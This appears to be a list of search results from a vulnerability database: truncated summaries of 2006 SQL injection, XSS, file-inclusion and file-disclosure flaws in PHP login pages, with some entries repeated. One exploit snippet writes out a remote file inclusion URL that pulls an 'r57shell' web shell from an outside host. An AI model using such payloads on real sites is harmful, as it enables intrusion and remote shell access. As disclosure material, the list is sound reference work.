CVE-2006-5060

The CVE-2006-5060 entry concerns a cross-site scripting (XSS) vulnerability in Jamroom 3.0.16 (and possibly earlier) within login.php, exploitable via the forgot parameter in the forgot mode. The NVD details a CVSSv2 base score of 5.1 (Medium) with network attack vector, high complexity, no authe...

CVE-2006-4836

SQL injection vulnerability in login.php in DCP-Portal SE 6.0 allows remote attackers to execute arbitrary SQL commands via the username parameter. NOTE: The lostpassword.php and calendar.php vectors are already covered by CVE-2005-3365, and the search.php vector is already covered by CVE-2005-42...

CVE-2006-4836

CVE-2006-4836 affects DCP-Portal SE 6.0 via SQL injection in login.php (username parameter). Describes remote SQL execution risk and notes that lostpassword.php/calendar.php vectors are covered by CVE-2005-3365 and search.php by CVE-2005-4227. No explicit remediation or patch details are provided...

CVE-2006-4705

SQL injection vulnerability in login.php of Timesheet (aka Timesheet.php) 1.2.1 allows remote attackers to execute arbitrary SQL commands via the username parameter. This affects Timesheet 1.2.1 as reported by CVE records. The connected documents specify the vulnerability and payload vector but d...

phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities

phpAtm = v1.21 includelocation Remote File Inclusion Exploit Level : Dangerous Download : http://phpatm.free.fr/ Version : v1.21 Found By: KinSize MHG Security Team Code : include$includelocation.'include/conf.php'; exploit:...

WebspotBlogging login.php远程SQL注入漏洞

BUGTRAQ ID: 16319 CVECAN ID: CVE-2006-0324 WebspotBlogging是一款PHP编写的Blog程序。 WebspotBlogging对用户提交给的参数缺少正确充分的过滤，远程攻击者可以利用此漏洞非授权操作数据库绕过认证。 WebspotBlogging的login.php脚本对用户提交username参数数据缺少充分过滤，远程攻击者可以通过在输入数据中插入特定的SQL命令来非授权获取对数据库的访问。 WebspotBlogging WebspotBlogging 3.0 WebspotBlogging ---------------...

Spaminator 1.7 - page Remote File Inclusion

Spaminator 1.7 - page Remote File Inclusion Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found By Drago84 SourcE CodE: http://freshmeat.net/redir/spaminator/16281/urltgz/spaminator-1.7.tar.gz Page Affect is: /src/Login.php Problem is include "$page.php"; Path : Declare $page ExpL:...

Spaminator 1.7 - 'page' Remote File Inclusion

Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found By Drago84 SourcE CodE: http://freshmeat.net/redir/spaminator/16281/urltgz/spaminator-1.7.tar.gz Page Affect is: /src/Login.php Problem is include "$page.php"; Path : Declare $page ExpL:...

Spaminator 1.7. ($page) Remote File Include

Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found By Drago84 SourcE CodE: http://freshmeat.net/redir/spaminator/16281/urltgz/spaminator-1.7.tar.gz Page Affect is: /src/Login.php Problem is include "$page.php"; Path : Declare $page ExpL:...

Spaminator <= 1.7 (page) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ========================================================== Spaminator = 1.7 page Remote File Include Vulnerability ========================================================== Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found B...

SolpotCrew Advisory #6 - phpCC - Beta 4.2 &#40;base_dir&#41; Remote File Inclusion

SolpotCrew Community phpCC - Beta 4.2 basedir Remote File Inclusion Download file : http://www.phpcc.at/downloadfile1.html Bug Found By :Solpot a.k.a k. Hasibuan 06-08-2006 contact: [email protected] Website : http://www.solpotcrew.org/adv/solpot-adv-05.txt Greetz: choi , h4ntu , Ibnusina ,...

CVE-2006-3613

Multiple cross-site scripting (XSS) vulnerabilities exist in Chamberland Technology ezWaiter 3.0 Online (and possibly Enterprise Software). The issues allow remote attackers to inject arbitrary web script or HTML via: (1) itemfor (the “Who is this item for?” field) and (2) special (the “Special I...

MyMail 1.0 - &#039;login.php&#039; Cross-Site Scripting

source: https://www.securityfocus.com/bid/18656/info MyMail is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an...

CVE-2006-3103

CVE-2006-3103 describes a cross-site scripting (XSS) vulnerability in Bitweaver 1.3, allowing remote attackers to inject arbitrary web script or HTML via (1) the error parameter in users/login.php and (2) the feedback parameter in articles/index.php. The connected records confirm Bitweaver as the...

aWebNews &lt;= 1.0 &#40;login.php&#41; Remote DocumentRoot file disclosure

/ Federico Fazzi, [email protected] / aWebNews = 1.0 login.php Remote DocumentRoot file disclosure / 04/06/2006 5:48 login.php: line 64-68, Bug: -- start -- if $GET'page' == "" $pagetogo = "index.php"; else $pagetogo = $GET'page'; -- end -- Proof of concept: Open the browser and go at:...

Multiple file include exploits in Xtreme Downloads v.1.0

Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil & black-code team : site-down type : file include exploits : download.php http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? manager.php...

CVE-2006-2740

Multiple SQL injection vulnerabilities in Epicdesigns tinyBB 0.3 allow remote attackers to execute arbitrary SQL commands via the 1 q parameter in a forgot.php, and the 2 username and 3 password parameters in b login.php, and other unspecified vectors...

tinyBB <= 0.3 Remote (Include / SQL Injection) Vulnerabilities

Exploit for unknown platform in category web applications ============================================================== tinyBB ICQ: 10072 MSN/Mail: email protected web: www.nukedx.com This exploits works on tinyBB = 0.3 Original advisory can be found at: http://www.nukedx.com/?viewdoc=33...

Sql injection

SQL injection vulnerability in login.php in YourFreeWorld.com Short Url & Url Tracker Script allows remote attackers to execute arbitrary SQL commands via the id parameter...

CVE-2006-2509

The CVE-2006-2509 entry concerns YourFreeWorld.com Short Url & Url Tracker Script. The vulnerable component is login.php, where the id parameter allows SQL injection, enabling remote attackers to execute arbitrary SQL commands. The available references describe the issue as a SQL injection affect...